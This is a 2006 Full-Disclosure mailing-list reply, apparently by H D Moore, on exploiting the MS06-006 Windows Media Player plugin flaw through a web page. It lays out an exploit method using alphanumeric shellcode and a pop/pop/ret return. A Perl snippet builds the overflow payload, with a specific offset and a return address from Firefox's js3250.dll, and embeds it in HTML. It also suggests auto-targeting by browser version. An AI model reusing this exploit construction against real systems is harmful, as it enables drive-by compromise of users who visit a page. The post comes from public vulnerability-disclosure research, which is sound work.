Re: MS06-06 Windows Media Player Exploitation

[H D Moore <fdlist () digitaloffense net>]

Still getting some annoying crashes (SEH trick in alphanum code is 
annoying when you are trying to debug something...), but the basic 
solution is:

1) Use alphanumeric shellcode
2) Use a return address that does not have bytes over 0x7F
3) Use a pop/pop/ret and hop over return w/o restricted bytes

my $pattern   = Pex::Text::PatternCreate(16384);        
substr($pattern, 2086, 4, pack('V', 0x60082336)); # pop ebx, pop ebp, ret
substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr]
substr($pattern, 2090, length($shellcode), $shellcode);
$content   = "<html><body><embed src=\"$pattern.wmv\"></body></html>";

Return address is from js3250.dlll in Firefox 1.5.0.1, you should 
auto-target based on the browser version.

-HD

On Thursday 16 February 2006 16:26, c0ntex wrote:
> No exploit, just some basic research - anyone with 100% Ascii win32
> shellcode?
>
> http://open-security.org/winmedia/index.html
>
> --
>
> regards
> c0ntex
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/